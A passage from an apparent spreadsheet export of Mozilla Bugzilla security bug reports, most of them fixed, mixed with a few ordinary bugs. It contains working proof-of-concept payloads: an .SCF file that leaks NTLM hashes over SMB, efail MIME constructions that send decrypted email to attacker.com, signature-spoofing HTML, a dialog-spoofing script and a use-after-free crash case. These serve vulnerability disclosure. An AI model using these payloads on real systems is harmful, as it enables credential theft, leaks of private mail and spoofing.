   by 0x80650B2: graphite2::Silf::readGraphite(unsigned char const*, unsigned int, graphite2::Face&amp;, unsigned int) (Silf.cpp:216)
   by 0x80555B7: graphite2::Face::readGraphite(graphite2::Face::Table const&amp;) (Face.cpp:149)
   by 0x804EF04: (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) (gr_face.cpp:59)
   by 0x804FCE8: gr_make_face_with_ops (gr_face.cpp:89)
   by 0x804FCE8: gr_make_file_face (gr_face.cpp:242)
   by 0x804C77A: Parameters::testFileFont() const (gr2FontTest.cpp:639)
   by 0x804D936: main (gr2FontTest.cpp:798)</t>
        </is>
      </c>
      <c r="X4532" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4533">
      <c r="A4533" t="n">
        <v>1812354</v>
      </c>
      <c r="B4533" t="inlineStr">
        <is>
          <t>2023-01-25 08:01:56 -0800</t>
        </is>
      </c>
      <c r="C4533" t="inlineStr">
        <is>
          <t>.SCF file can also send NTLM hashes</t>
        </is>
      </c>
      <c r="D4533" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:35 -0700</t>
        </is>
      </c>
      <c r="E4533" t="n">
        <v>1</v>
      </c>
      <c r="F4533" t="n">
        <v>1</v>
      </c>
      <c r="G4533" t="n">
        <v>3</v>
      </c>
      <c r="H4533" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4533" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4533" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K4533" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4533" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4533" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4533" t="inlineStr">
        <is>
          <t>[fixed by bug 1809923][adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q4533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4533" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4533" t="n">
        <v>0</v>
      </c>
      <c r="U4533" t="n">
        <v>0</v>
      </c>
      <c r="V4533" t="n">
        <v>14</v>
      </c>
      <c r="W4533" t="inlineStr">
        <is>
          <t>Created attachment 9314041
Untitled_ Jan 26, 2023 12_01 AM.webm
+++ This bug was initially created as a clone of Bug #1812338 +++
On Windows, .SCF file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using .SCF file
Sample .scf file which can automatically connect via SMB from file folder or send hashes
```````````````
[Shell]
Command=2
IconFile=//192.168.1.109/share/pentestlab.ico
[Taskbar]
Command=ToggleDesktop
```````````````
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=722524</t>
        </is>
      </c>
      <c r="X4533" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4534">
      <c r="A4534" t="n">
        <v>1419417</v>
      </c>
      <c r="B4534" t="inlineStr">
        <is>
          <t>2017-11-21 06:34:51 -0800</t>
        </is>
      </c>
      <c r="C4534" t="inlineStr">
        <is>
          <t>[efail] S/MIME and PGP decryption oracles can be built with HTML emails</t>
        </is>
      </c>
      <c r="D4534" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:16 -0800</t>
        </is>
      </c>
      <c r="E4534" t="n">
        <v>1</v>
      </c>
      <c r="F4534" t="n">
        <v>1</v>
      </c>
      <c r="G4534" t="n">
        <v>2</v>
      </c>
      <c r="H4534" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4534" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J4534" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4534" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L4534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4534" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4534" t="inlineStr"/>
      <c r="Q4534" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4534" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4534" t="inlineStr">
        <is>
          <t>Thunderbird 62.0</t>
        </is>
      </c>
      <c r="T4534" t="n">
        <v>1</v>
      </c>
      <c r="U4534" t="n">
        <v>0</v>
      </c>
      <c r="V4534" t="n">
        <v>224</v>
      </c>
      <c r="W4534" t="inlineStr">
        <is>
          <t>Created attachment 8930484
Decryption oracle PoC 1: Leaking plaintext through reply/forward
User Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170929010941
Steps to reproduce:
In the scope of academic research within the efail project, in cooperation with Ruhr-University Bochum and FH Münster, Germany we discovered various security issues in Thunderbird: An attacker who is in possession of S/MIME or PGP encrypted messages can embed them into specially crafted HTML mails and re-send them to the intended receiver. When the message is read and decrypted by the receiver, the plaintext is leaked to an attacker-controlled server. Furthermore, this issue allows an attacker to spoof PGP signatures. The root cause for these vulnerabilities lies in the way Thunderbird handles multipart messages. The general cause is present since Thunderbird version 0.1, released in 2003.
All issues are present in the current Thunderbird version 52.4.0 (if not stated otherwise).
********************************************************************************
*** General Cause: Multipart messages are rendered as a single HTML document ***
********************************************************************************
Thunderbird internally uses HTML to display emails. If a message consists of multiple parts, all parts are put into a single HTML document, separated by a &lt;br&gt;, &lt;fieldset&gt; and &lt;div&gt; tag::
&lt;html&gt;
&lt;head&gt;&lt;/head&gt;
&lt;body&gt;
&lt;BR&gt;&lt;FIELDSET CLASS="mimeAttachmentHeader"&gt;&lt;/FIELDSET&gt;&lt;BR/&gt;
&lt;div class="moz-text-html" lang="x-western"&gt;*part-01*&lt;/div&gt;
&lt;BR&gt;&lt;FIELDSET CLASS="mimeAttachmentHeader"&gt;&lt;/FIELDSET&gt;&lt;BR/&gt;
&lt;div class="moz-text-html" lang="x-western"&gt;*part-02*&lt;/div&gt;
etc.
&lt;/body&gt;
&lt;/html&gt;
This is dangerous to be used in combination with cryptography, because it allows an attacker to wrap encrypted or signed content into her own HTML/CSS code:
multipart/mixed
   |--- Content-Type: text/html
   |    [arbitrary HTML or CSS]
   |--- [enc or signed messages]
   +--- Content-Type: text/html
        [arbitrary HTML or CSS]
****************************************
*** Issue A: Leaking encrypted mails ***
****************************************
/Attacker model/: Attacker is in possession of S/MIME or PGP/MIME encrypted messages, which she may have obtained as passive man-in-the-middle or by actively hacking into the victim's mail server or gateway
/Attacker's goal/: Leak the plaintext by wrapping the ciphertext into an HTML mail sent to and decrypted by the victim
-------------------------------------------------------------
*Proof of concept 1: Leaking plaintext through reply/forward*
-------------------------------------------------------------
Prerequisites:
- victim reads and composes messages in HTML
- victim replies or forwards the message
Attack:
The attacker can hide the encrypted part, for example, in an iframe:
multipart/mixed
   |--- Content-Type: text/html
   |    Please answer to this email
   |    &lt;iframe width="1" height="1" frameborder="0"&gt;
   |--- Content-Type: multipart/encrypted
   |--- Content-Type: application/pkcs7-mime
   +--- Content-Type: text/html
        &lt;/iframe&gt;
The encrypted part is decrypted as soon as the victim reads the mail. If the victim replies to or forwards the mail, the decrypted plaintext will be sent, hidden in the invisible iframe and without the victim noticing. Note that this variant of the attack only works if message bodys are viewed as original HTML (default) *and* the user checked `compose messages in HTML format' (non default). Also note that hundreds of collected S/MIME or PGP/MIME ciphertexts can be embedded in the multipart mail and all the plaintexts leaked with one single reply.
----------------------------------------------------------
*Proof of concept 2: Leaking plaintext through HTML forms*
----------------------------------------------------------
Prerequisites:
- victim reads messages in HTML
- victim submits an HTML form by clicking on an area in the message
Attack:
Another variant of the attack, which works since Thunderbird 3.0 is using HTML forms to leak the plaintext:
multipart/mixed
   |--- Content-Type: text/html
   |    &lt;form action="https://attacker.com/leak" method="post"&gt;
   |    &lt;button type="submit"&gt;
   |    &lt;textarea
   |--- Content-Type: multipart/encrypted
   +--- Content-Type: application/pkcs7-mime
Again, the plaintext for hundreds of collected S/MIME or PGP/MIME ciphertexts could be leaked by a single form submission. The user still has to actively submit the form, but with CSS it is possible to make the form being submitted if the user clicks *somewhere* into the (harmless) message shown to him which may even security-aware users. Other variants may include setting up fake scrollbars or Thunderbird warnings that submit the form if clicked.
-------------------------------------------------------------
*Proof of concept 3: Leaking plaintext through src attribute*
-------------------------------------------------------------
Prerequisites:
- victim reads messages in HTML
- victim allows remote content (further attack variants possible, see below)
Attack:
Another variant of this attack is to use the HTML src attribute, for example, for invisible iframes or image tags to leak the plaintext:
multipart/mixed
   |--- Content-Type: text/html
   |    &lt;img src='https://attacker.com/
   |--- Content-Type: multipart/encrypted
   |--- Content-Type: application/pkcs7-mime
   +--- Content-Type: text/html
        '&gt;
After decryption, the plaintext is urlencoded and sent as HTTP GET request to the attacker if the user allows remote content to be loaded. To encourage this, there are various options:
- The attacker may spoof the mail address to a `trusted' source which the victim already has whitelisted (for example, some company which requires remote image for their mails being readable)
- The attacker may sent a fake newsletter/spam mail and leak the plaintext by tempting the victim to click on a `Click here to unsubscribe' link
- From Thunderbird 12.0 to 52.0.1, remote content had automatically been loaded if a news:// uri schemes was used in the HTML src attribute which could be used to leak the plaintext to a NNTP server
- In the current version (52.4.0), Thunderbird can be tricked into thinking a mail is an RSS feed if the mail begins with certain headers:
  From - Fri Nov 17 20:13:09 2017
  X-Mozilla-Status2: 00000040
Note that this seems to work only for local (Movemail) message setups, not if the mail is fetched via IMAP or POP3
- In the current version (52.4.0), mailto links can be used to force an HTML context (even if the user has set messages to be neither viewed nor composed in HTML format). While most html tags seem to be filtered, &lt;video poster="url"&gt; gets through and automatically triggers a connection:
  mailto:?html-body=%3Cvideo%20poster%3D%22http%3A%2F%2Fattacker.com%22%3E"&gt;
Note however, that this can probably not be used to leak plaintext because we have not found a way to define multipart messages to be included in mailto: links
- There may be other bypasses for remote content blocking like &lt;link preconnect="..."&gt; which we reported in October (bug 1408867)
Note that again multiple S/MIME and PGP/MIME messages can be leaked in a single mail that is read and decrypted. There seems to be an upper limited of 1024kB for the length of HTTP GET requests sent by Thunderbird, but an attacker can include multiple HTML tags with src attributes in case the messages should exceed this limit.
Find attached three emails which leak S/MIME and PGP/MIME encrypted messages to localhost:8080. For a proof of concept, you need to replace the encrypted parts with S/MIME or PGP/MIME messages you have the private key for, obviously.
*******************************************
*** Issue B: Signature Spoofing Attacks ***
*******************************************
/Attacker model/: Attacker is in possession of a valid OpenPGP signature from the entity to be impersonated, which she may have obtained from email correspondence, public mailing lists, signed software packages, signed GitHub commits, etc; this should be a realistic scenario, so we don't even need an NSA-like attacker
/Attacker's goal/: Given her own text, the attacker wants to spoof a correct signature to be displayed by Enigmail
There are various ways to achieve this goal. CSS can be used to hide the signed part (for example, by setting the font size or color). Furthermore, the signed part can be embedded by and therefore hidden in HTML tags.
Note that this attack does not seem to work for S/MIME because Thunderbird's S/MIME implementation only shows a valid signature if the whole message (including all parts) is correctly signed.
-------------------------------------------------------------------
*Proof of concept 1: Signature spoofing with CSS and plaintext tag*
-------------------------------------------------------------------
Prerequisites:
- victim reads messages in HTML
Attack:
The signed part can be hidden by setting the font color to the default background color (white). Furthermore, the &lt;plaintext&gt; tag can be used to get rid of the border being displayed:
multipart/mixed
   |--- Content-Type: text/html
   |    [Arbitrary text inserted by the attacker]
   |    &lt;div style="color:white"&gt;&lt;plaintext&gt;
   +--- Content-Type: multipart/signed
        [PGP signed part]
------------------------------------------------------------------
*Proof of concept 2: Signature spoofing with invisible iframe tag*
------------------------------------------------------------------
Prerequisites:
- victim reads messages in HTML
Attack:
The signed part can be hidden in an invisible iframe:
multipart/mixed
   |--- Content-Type: text/html
   |    [Arbitrary text inserted by the attacker]
   |    &lt;iframe width="1" height="1" frameborder="0"
   +--- Content-Type: multipart/signed
        [PGP signed part]
Find attached two emails which are displayed as correctly signed by Phil Zimmermann in Thunderbird/Enigmail while the attacker can completely alter the actual text that is shown to the user.</t>
        </is>
      </c>
      <c r="X4534" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4535">
      <c r="A4535" t="n">
        <v>1255298</v>
      </c>
      <c r="B4535" t="inlineStr">
        <is>
          <t>2016-03-09 21:30:09 -0800</t>
        </is>
      </c>
      <c r="C4535" t="inlineStr">
        <is>
          <t>ServiceWorkerRegistration.showNotification violates cross-compartment access invariants</t>
        </is>
      </c>
      <c r="D4535" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:45 -0700</t>
        </is>
      </c>
      <c r="E4535" t="n">
        <v>1</v>
      </c>
      <c r="F4535" t="n">
        <v>1</v>
      </c>
      <c r="G4535" t="n">
        <v>3</v>
      </c>
      <c r="H4535" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4535" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4535" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K4535" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4535" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4535" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4535" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4535" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+] btpp-active</t>
        </is>
      </c>
      <c r="Q4535" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4535" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4535" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T4535" t="n">
        <v>1</v>
      </c>
      <c r="U4535" t="n">
        <v>0</v>
      </c>
      <c r="V4535" t="n">
        <v>19</v>
      </c>
      <c r="W4535" t="inlineStr">
        <is>
          <t>Created attachment 8728805
Test patch that triggers some nice fatal asserts when the test is run
Found this while auditing AutoJSAPI usage in the tree.  
I'm not sure whether this actually needs to be security-sensitive or whether it would be a safe crash in release.  The basic violation is that we call JS_WriteStructuredClone with "cx" and "value" in different compartments.
Bobby, do you know what the release situation there is?
Anyway, the bug is that the refactoring done in bug 1114554 made it so the code that actually creates a notification in Notification::CreateAndShow uses an AutoJSAPI with a passed-in nsIGlobalObject to set up a JSContext.  It then structured-clones the "data" passed in via the NotificationOptions dictionary.
The problem is that the "data" in that dictionary is in the caller compartment (further up the callstack; all codepaths that land in Notification::CreateAndShow start out in binding code coming from JS).  And the caller compartment need not match the compartment of the nsIGlobalObject we're using.
I don't know enough about serviceworkers yet to write a minimal testcase (for which I just need the smallest possible serviceworker test that can reach Notification::CreateAndShow.  But I did verify that I get nice fatal asserts if I hack up test_notification_get.html in the way shown in the attached diff and then run it.  I would expect that calling showNotification over Xrays would likewise fail if it passed "data" in the NotificationOptions.
I can probably fix the actual code here, but could use a hand with writing a test quickly.</t>
        </is>
      </c>
      <c r="X4535" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4536">
      <c r="A4536" t="n">
        <v>1718571</v>
      </c>
      <c r="B4536" t="inlineStr">
        <is>
          <t>2021-06-28 13:08:27 -0700</t>
        </is>
      </c>
      <c r="C4536" t="inlineStr">
        <is>
          <t>Javascript dialog remains active in window after redirect</t>
        </is>
      </c>
      <c r="D4536" t="inlineStr">
        <is>
          <t>2024-05-30 10:34:09 -0700</t>
        </is>
      </c>
      <c r="E4536" t="n">
        <v>1</v>
      </c>
      <c r="F4536" t="n">
        <v>1</v>
      </c>
      <c r="G4536" t="n">
        <v>2</v>
      </c>
      <c r="H4536" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4536" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4536" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4536" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4536" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4536" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q4536" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4536" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4536" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T4536" t="n">
        <v>1</v>
      </c>
      <c r="U4536" t="n">
        <v>0</v>
      </c>
      <c r="V4536" t="n">
        <v>41</v>
      </c>
      <c r="W4536" t="inlineStr">
        <is>
          <t>Created attachment 9229216
index.html
Javascript dialog that is shown while a basic authentication dialog is displayed remains active in the window even after redirects.
When opening a new URL through window.open(), the opener is allowed to modify the about:blank document until the target URL starts loading. For pages that require basic authentication, Firefox will display the authentication dialog while remaining at about:blank.
This behavior allows the opener to append a script to that page that will show a Javascript dialog when the basic-authentication dialog is displayed. After the authentication dialog is closed, the script can redirect the page to any other domain and the Javascript dialog will remain active in that window.
Finally, the malicious code is loaded from a data URI in an Iframe, so the Javascript dialog will show "This page says" in its title instead of the URL of the attacker's page.
Passing the credentials directly to the URL (as in https://test@google.com) shows a different dialog that also works for the attack. Perhaps there are other types of dialogs that are vulnerable to this.
Video: https://youtu.be/Sk6tAGEMH4I
POC is attached.
This is similar to Bug 1313916.
Source code:
&lt;meta charset="UTF-8"&gt;
&lt;a href="https://jigsaw.w3.org/HTTP/Basic/" onclick="e(href); return false;"&gt;Click here&lt;/a&gt;
&lt;script&gt;
function e(url){
    var x = open(url,'','width=800,height=400'); 
    var s = document.createElement('script');
    s.src = 'data:text/plain,function checkFocus(){fetch("data:,").then(()=&gt;{document.hasFocus()?checkFocus():(alert("Arbitrary message 🙂"),location.replace("https://jigsaw.w3.org"))})}document.title="Google",checkFocus();';
    setTimeout(() =&gt; {x.document.body.appendChild(s);},100);
}
&lt;/script&gt;</t>
        </is>
      </c>
      <c r="X4536" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4537">
      <c r="A4537" t="n">
        <v>1626350</v>
      </c>
      <c r="B4537" t="inlineStr">
        <is>
          <t>2020-03-31 11:04:57 -0700</t>
        </is>
      </c>
      <c r="C4537" t="inlineStr">
        <is>
          <t>[iOS] Validate new Chronological Tabs design in the wild</t>
        </is>
      </c>
      <c r="D4537" t="inlineStr">
        <is>
          <t>2020-10-08 12:56:37 -0700</t>
        </is>
      </c>
      <c r="E4537" t="n">
        <v>1</v>
      </c>
      <c r="F4537" t="n">
        <v>1</v>
      </c>
      <c r="G4537" t="n">
        <v>5</v>
      </c>
      <c r="H4537" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4537" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J4537" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K4537" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4537" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4537" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4537" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4537" t="inlineStr"/>
      <c r="Q4537" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4537" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4537" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4537" t="n">
        <v>1</v>
      </c>
      <c r="U4537" t="n">
        <v>0</v>
      </c>
      <c r="V4537" t="n">
        <v>2</v>
      </c>
      <c r="W4537" t="inlineStr">
        <is>
          <t>**Request Description** 
Confirm users can move between tabs more easily with new design &amp; ensure we haven’t broken any unexpected edge cases
* Do users prefer chronological ordering over previous solution?
* Does chronological ordering break anything that users are currently using tabs for?
* Are users struggling to find any tabs functionality in the new design?
**Deadline** 
Plan to launch experiment in the 2nd half of Q2
**Priority Level** 
(1 = High 2 = Medium, 3 = Low): 1
**Priority Level Description** 
This project addresses multiple company goals for mobile, including experimentation and improving new user retention
**Supporting Information**
Github ticket: https://github.com/mozilla-mobile/firefox-ios/issues/6204
PRD: https://docs.google.com/document/d/1_DaKVU-Bg5ikGRNjgSjHHuEmNNX2iN5HliYsSNeuWwQ/edit
Research plan for design iteration: https://docs.google.com/document/d/1ZAsR2qWdp1WICAHTFf-uTbW2pE5EpkHlrpkPGRUs0gg/edit</t>
        </is>
      </c>
      <c r="X4537" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4538">
      <c r="A4538" t="n">
        <v>1173729</v>
      </c>
      <c r="B4538" t="inlineStr">
        <is>
          <t>2015-06-11 04:53:34 -0700</t>
        </is>
      </c>
      <c r="C4538" t="inlineStr">
        <is>
          <t>Update generic close icon and new tab button icon on Windows 10</t>
        </is>
      </c>
      <c r="D4538" t="inlineStr">
        <is>
          <t>2016-04-12 02:14:14 -0700</t>
        </is>
      </c>
      <c r="E4538" t="n">
        <v>1</v>
      </c>
      <c r="F4538" t="n">
        <v>1</v>
      </c>
      <c r="G4538" t="n">
        <v>2</v>
      </c>
      <c r="H4538" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4538" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4538" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4538" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4538" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4538" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4538" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4538" t="inlineStr"/>
      <c r="Q4538" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4538" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4538" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T4538" t="n">
        <v>1</v>
      </c>
      <c r="U4538" t="n">
        <v>0</v>
      </c>
      <c r="V4538" t="n">
        <v>21</v>
      </c>
      <c r="W4538" t="inlineStr">
        <is>
          <t>Notably, this will make the tab close button larger for touch-friendliness.</t>
        </is>
      </c>
      <c r="X4538" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4539">
      <c r="A4539" t="n">
        <v>1271460</v>
      </c>
      <c r="B4539" t="inlineStr">
        <is>
          <t>2016-05-09 15:16:48 -0700</t>
        </is>
      </c>
      <c r="C4539" t="inlineStr">
        <is>
          <t>Heap-use-after-free mozilla::dom::Element::UpdateLinkState</t>
        </is>
      </c>
      <c r="D4539" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:11 -0700</t>
        </is>
      </c>
      <c r="E4539" t="n">
        <v>1</v>
      </c>
      <c r="F4539" t="n">
        <v>1</v>
      </c>
      <c r="G4539" t="n">
        <v>3</v>
      </c>
      <c r="H4539" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4539" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4539" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4539" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L4539" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4539" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4539" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4539" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+] btpp-active</t>
        </is>
      </c>
      <c r="Q4539" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4539" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4539" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T4539" t="n">
        <v>1</v>
      </c>
      <c r="U4539" t="n">
        <v>0</v>
      </c>
      <c r="V4539" t="n">
        <v>18</v>
      </c>
      <c r="W4539" t="inlineStr">
        <is>
          <t>Run the bellow PoC, allow firefox reload multiple times
=== PoC 
&lt;script&gt;
function delay() {
	var container = new Array()
	var spray_size = 0x80000
	var region_size = 0x80
	for(var i=0; i&lt;spray_size; i++) {
		container[i] = new Array();
		for(var j=0; j&lt;region_size/8; j++)
			container[i][j] = 0x41414141
	}
}
function testcase() {
	document.documentElement.contentEditable="true"
	document.documentElement.style.cssText = 'text-overflow: unset'
	document.documentElement.hidden="false"
	document.documentElement.innerHTML = '&lt;table&gt;&lt;tfoot&gt;&lt;tr id="BBBB" &gt;&lt;td&gt;'
	delay() // help easier to crash firefox
	document.getSelection().selectAllChildren(document.getElementById('BBBB'))
	document.body.remove()
	document.documentElement.style.MozUserModify='read-write'
	document.documentElement.remove()
	setTimeout(function(){window.location.reload()},500)
}
&lt;/script&gt;
&lt;body onload='testcase();'&gt;
=== ASAN 49 stack trace
==1025==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000411268 at pc 0x7f21b42314ec bp 0x7ffeda8ac3d0 sp 0x7ffeda8ac3c8
READ of size 8 at 0x611000411268 thread T0 (Web Content)
    #0 0x7f21b42314eb in GetElement /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/Link.h:89
    #1 0x7f21b42314eb in nsIDocument::FlushPendingLinkUpdates() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsDocument.cpp:10293
    #2 0x7f21b42fe4c9 in FindMatchingElements&lt;false, AutoTArray&lt;mozilla::dom::Element *, 128&gt;, nsSimpleContentList&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsINode.cpp:2823
    #3 0x7f21b42fe4c9 in nsINode::QuerySelectorAll(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsINode.cpp:2906
    #4 0x7f21b5a6e698 in mozilla::dom::DocumentBinding::querySelectorAll(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:3453
    #5 0x7f21b5ea4495 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2781
    #6 0x7f21bbb4f689 in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #7 0x7f21bbb4f689 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:480
    #8 0x7f21bbb3ed68 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:531
    #9 0x7f21bbb3ed68 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2831
    #10 0x7f21bbb2019e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:426
    #11 0x7f21bbb4fc6f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:498
    #12 0x7f21bbb501f1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:544
    #13 0x7f21bb907161 in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/proxy/Wrapper.cpp:163
